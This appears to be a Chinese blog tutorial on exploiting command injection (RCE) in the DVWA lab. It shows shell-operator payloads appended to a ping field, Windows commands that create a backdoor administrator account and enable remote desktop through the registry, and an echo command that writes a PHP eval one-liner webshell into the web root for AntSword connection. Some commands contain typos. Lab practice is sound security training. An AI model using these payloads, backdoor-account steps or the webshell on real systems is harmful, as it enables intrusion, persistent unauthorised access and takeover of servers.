当前位置: 首页 > article >正文

rce命令执行原理及靶场实战(详细)

2. 原理

  1. 在根源上应用系统从设计上要给用户提供一个指定的远程命令操作的接口
  2. 漏洞主要出现在常见的路由器、防火墙、入侵检测等设备的web管理界面上。在管理界面提供了一个ping服务。
  3. 提交后,系统对该IP进行ping,并且返回结果。
  4. 如果后台服务器并没有对其进行严格的过滤或者筛选时,那攻击者提交一个具有危险的命令就会被后台执行,从而可以进行控制整个后台服务。
  5. 要掌握过滤

3. 执行方式

管道符:

“ | ” 直接执行后面的语句 ping127.0.0.1whoami

“ || ” 前面的语句执行出错则执行后面的语句 ping127.o.0.1jwhoami

“ & ” 前面的语句为假则执行后面的语句 ping127.0.0.1&whoami

”&&“ 前面的语句为假,直接出错,前面的语句为真,执行后面的语句 ping127.0.0.1&&whoami

4. 符号操作

4.1. |whoami

这是一个简单的命令执行,输入网址进行ping服务

我们使用上面的管道符进行实验

172.220.52.186|whoami

| :这个是不管前面是什么,直接执行后面的语句

IP地址|命令

命令执行成功如上图所示

4.2. ||ipconfig

前面出错执行后面语句

asdfa||ipconfig 命令执行查看ip

4.3. &whoami

哪一个对了执行哪一个

&:当前面一个出错则可以执行后面的,

asdf&whoami

前面ping的通则执行前面的 172.220.52.186&whomi

4.4. &&ipconfig

前面的语句为假,直接出错,前面的语句为真,执行两个语句

ping127.0.0.1&&whoami 前面正常,两个执行

27.0.0.1&&whoami,出错,后面不执行

上面该dvwa靶场实验练习管道符,管道符为命令执行重要符号。

熟悉了管道符正常操作后进行实战

5. 模拟远程连接

任务:通过命令执行漏洞,对目标靶机侵入创建虚拟账户,并对其进行远程访问。

熟记指令

  1. 创建用户:net user yuancheng 123/add //创建yuancheng密码为123
  2. 查看用户:net user
  3. 将用户添加到管理员组: 127.0.0.1&net localgroup Administrators yuancheng /add
  4. 开启远程管理服务: 127.0.0.1&net user yuancheng /active:yes

特况:

如果连不上可能远程桌面功能没有打开,使用如下命令打开:

asdf&add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


5.1. 开始

asdf&net user yuancheng 123456 /add

呃,指令不成功,直接去靶机创建用户并提升为管理员

net user yuancheng 123456 /add //如下图所示

net localgroup Administrators yuancheng /add //提管理员

远程连接

输入密码

ok,连接成功

6. 写马

写入一句话木马并使用webshell连接

熟记指令:

  1. 查看当前路径 chdir //查看路径,之后将一句话木马写入该路径
  2. 查看 C 盘下的文件 dir C:\ //可以看到C盘文件
  3. 写入一句话木马、用 webshell 管理工具连接成功 写入一句话木马、用 webshell 管理工具连接
  4. echo "<?php @eval($_POST['cmd']);?>" > C:\phpstudy\PHPTutorial\WWW\webshell.php
  5. 蚁剑连接

6.1. 开始

查看路径

dir C:\ 查看文件情况

将其木马写入www即可

echo "<?php @eval($_POST['cmd']);?>" > C:\phpstudy\PHPTutorial\WWW\webshell.php

使用蚁剑连接,在木马存在的目录

C:\phpstudy\PHPTutorial\WWW\webshell.php

可以查看到文件

http://www.lryc.cn/news/2385596.html

相关文章:

  • Fuzz 模糊测试篇JS 算法口令隐藏参数盲 Payload未知文件目录
  • 展示了一个三轴(X, Y, Z)坐标系!
  • 【b站计算机拓荒者】【2025】微信小程序开发教程 - chapter1 初识小程序 - 3项目目录结构4快速上手
  • LLM Tuning
  • 云计算与大数据进阶 | 28、存储系统如何突破容量天花板?可扩展架构的核心技术与实践—— 分布式、弹性扩展、高可用的底层逻辑(下)
  • SQL每日一练(3)
  • Axure高级交互设计:中继器嵌套动态面板实现超强体验感台账
  • 水利数据采集MCU水资源的智能守护者
  • 函数式编程思想详解
  • SAP全面转向AI战略,S/4HANA悄然隐身
  • origin绘图之【如何将横坐标/x设置为文字、字母形式】
  • 工业智能网关建立烤漆设备故障预警及远程诊断系统
  • cv2.VideoWriter_fourcc(*‘mp4v‘)生成的视频无法在浏览器展
  • MySQL 8.0 OCP 1Z0-908 161-170题
  • Kafka Streams 和 Apache Flink 的无状态流处理与有状态流处理
  • React从基础入门到高级实战:React 基础入门 - 简介与开发环境搭建
  • LM-BFF——语言模型微调新范式
  • NVMe高速传输之摆脱XDMA设计2
  • github开源版pymol安装(ubuntu22.04实战版)
  • pycharm无需科学上网工具下载插件的解决方案
  • Halcon计算点到平面的距离没有那么简单
  • 基于DenseNet的医学影像辅助诊断系统开发教程
  • 数据中台如何设计?中台开发技术方案,数据治理方案,大数据建设方案合集
  • Python爬虫设置IP代理
  • Adminer 连接mssql sqlserver
  • C++系统IO
  • 利用 Python 爬虫获取唯品会 VIP 商品详情:实战指南
  • DELL EMC PowerStore BBU更换手册
  • css五边形
  • 三种常见脉冲神经网络编码方式解读